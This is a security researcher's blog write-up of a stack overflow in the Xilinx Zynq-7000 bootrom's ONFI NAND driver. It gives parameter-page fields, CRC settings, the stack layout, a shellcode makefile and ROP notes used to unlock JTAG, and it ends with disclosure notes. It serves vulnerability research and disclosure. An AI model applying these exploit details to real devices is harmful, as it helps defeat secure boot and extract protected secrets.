Introduction
Also known via DAAR-76201.
If you're just tuning in now and want context beyond "here's a bug in some rom code": Check out part 1 and part 2. I'll wait here.
Now - The Zynq-7000 series provides a root-of-trust via the usual methods: eFuse array containing hashes and/or keys. The actual scheme seems solid - I'm absolutely no cryptographer - and the implementation details that Xilinx doesn't document don't really expose anything particularly damning.
TL;DR
Zynq secureboot is not sufficient to protect secrets against an attacker with physical access. If you rely on this root of trust to protect a secret that is not unique per-device, reconsider your architecture.
Yes, you can probably recover bitstreams this way - I have not yet tried, but there is no reason that shouldn't work.
Bug
The Zynq ROM ONFI driver fails to do any validation of the ONFI parameter page. In normal flash devices this isn't configurable, but it's still technically untrusted data... And it has a lot of interesting fields that nominally dictate the organization and layout of the flash device (ECC, bad blocks, spare area, and so on).
An "emulator" that controls all of these fields is needed to exploit this, so we have to build one.
When the bootrom initially scans for ONFI devices, it grabs this parameter page and populates local copies of some of these fields (this function is nearly identical to
Onfi_NandInit
in the Xilinx xnandps driver).
Of particular (easiest-to-exploit)
interest is SpareBytesPerPage
- Everything else just needs to be legitimate enough to make it past some minimal checks. Since raw NAND is a disaster, it's not
uncommon for the chips to have some built-in-ECC - We can bypass all of the logic related to this just by reporting a manufacturer ID of any value but Micron's ID (0x2c
).
Finally, there's a CRC at the end. Using crcmod it looks a little like: crcmod.mkCrcFun(0x18005, initCrc=0x4f4e, rev=False)
Once the context is populated, and after some housekeeping (XNandPs_CfgInitialize
), the bootrom searches for the
ONFI "Bad Block Table".
Since NAND is so error-prone, there's a standardized (ish) method to provide a bitmap of known unusable whole blocks, and this is stored (along with ECC data)
in the "spare area" of flash pages. Usually this is all nicely aligned so that addressing is somewhat as simple as masking out a couple bits,
but the important part here is that this is the first time a value from our parameter page is used - XNandPs_ReadSpareBytes
does no
sanity checks before happily reading the entire spare page (per the descriptor) into the supplied buffer.
Since the buffer in question is a 0x200
long stack variable in XNandPs_SearchBbt
's frame, we have a trivial stack smash with very good control.
(It's even better than that - LR
gets incidentally set to the top of this buffer...I didn't end up using this.) We can even control the return
value of XNandPs_ReadSpareBytes
by supplying or not supplying the bad block table signature (Bbt0
). Register control is likewise very strong, R4
thru R11
are saved and restored
from the smashed frame:
[sp+0x000]
[sp+0x008] destination buffer
[...]
[sp+0x..4] other vars
[sp+0x..8] saved r4
[sp+0x..C] saved r5
[...]
[sp+0x..C] saved pc
The only remotely complex part about exploiting this is, well, the fact that it sits behind the ONFI interface. Luckily I had one of those Antminer boards kicking around, and they boot off ONFI NAND, so a bit of hot air and handful of bodge-wire joints later, it was broken out:
![]() |
---|
ONFI/NAND interface breakout |
ONFI?
I'll spare you the details of the ONFI emulation (and my code), but it's a pretty straightforward interface that shares a lot more with old school address busses than the relatively higher speed serialized communications of most other bulk storage (ok, mostly just *SPI, I guess). Kinda fun to write. I glued together my ONFI emulation of the bare subset of ONFI commands needed to reach this point: All told, something like 7 ONFI commands plus some state management - ONFI allows for a couple commands during a busy cycle (ie: while buffering or erasing a page). Since the overflow is within the first page read ever submitted, I can just naively spit out the payload and ignore addressing entirely. After gluing in some BRAM and a bit of JTAG code to push payloads up to the FPGA, I got the bootrom to fault, and then to jump to the UART handler.
insert that image here!
Exploit
Obviously this isn't sufficient - The Zynq boots with JTAG disabled and all kinds of interesting security features unlocked, plus it would be fun to debug the bootrom...
To rapidly prototype the payload/shellcode, I put together a tiny makefile to convince the linker to base everything at 0 as initially I had no idea where in RAM I was - I tried calculating it at some point and ended up being wildly off. Here's a copy, in case it's useful to someone:
as = arm-none-eabi-as
objcopy = arm-none-eabi-objcopy
objdump = arm-none-eabi-objdump
ld = arm-none-eabi-ld
proj = sc
all: $(proj).bin
disas: $(proj).bin
$(objdump) -D $(proj).bin -b binary -m armv7
sc.bin: $(proj).s
$(as) -o $(proj).o $(proj).s
$(ld) $(proj).o -Ttext 0 -Tdata 0 -o sc.elf
$(objcopy) -O binary $(proj).elf $(proj).bin
clean:
rm sc.bin
Although I had control, I was running into issues with the exploit. The goal was to poke a stub into RAM (push sp; pop pc
), and jump right into the stack that way - but it wasn't working.
The ROP seemed fine, but as soon as I jumped into shellcode everything broke. Thankfully I had one bit of output - I could jump to the UART bootloader and cause it to bring up the UART and
emit the "XLNX-ZYNQ" identification string. After chasing the issue through what I was certain was caching (no: they're off), then ordering (easy to ROP to dsb/isb), then page permissions (off, wrote
a chain to reconfigure them nevertheless)...I had the endianness flipped (thank you pwntools). So, lots of this could've been simpler.
Really, with all that effort it would've been simpler to just write a chain to re-enable JTAG and debug it normally...
Nevertheless, once my shellcode worked I could clean everything up and figure out where in memory I was. One thing to be aware of at this point is that any exceptions will cause the Zynq to reboot. The IVT can be remapped, but this comes at the cost of remapping some RAM away from the ROM. Perhaps this could be solved by setting up a couple virtual pages...But I am quite satisfied where things are, so you can do that ;)
Another benefit of using a "proper" assembler to build the payload is that I had access to handy macros for math and padding - arm-none-eabi-as
is better at simple addition than I am,
especially after midnight. I don't think there's any reason to release the whole ONFI tool, but here's the assembler file
I used to build the payload.
Zynq Bootrom unlocked:
sctlr: 0x8C50079, devcfg: 0x4E00607F, ocmcfg: 0x0
The shellcode simply unlocks JTAG, and spits out a few registers of interest: devcfg
contains the fabric config, including AES enable bits. sctlr
is the ARM core register which contains caching, prediction, and virtual memory enable bits. ocmcfg
is just the OCM configuration register. Nothing in the payload isn't contained in the TRM, but perhaps it makes this easier to follow.
Finally, I want to say that I cannot overstate how many random little rabbitholes I spent time chasing down, or how many tiny little things that prevented another bug from being exploitable. So it goes.
Demo?
Demo:
Disclosure notes
I don't think the exact timeline is particularly useful - Suffice to say that while Xilinx was difficult to initially get ahold of, they were usually responsive, always competent and straightforward. They did pay out a bounty. The bug was reproduced in a couple weeks, and their advisory was published just inside of 90 days. Good work :)
Go Top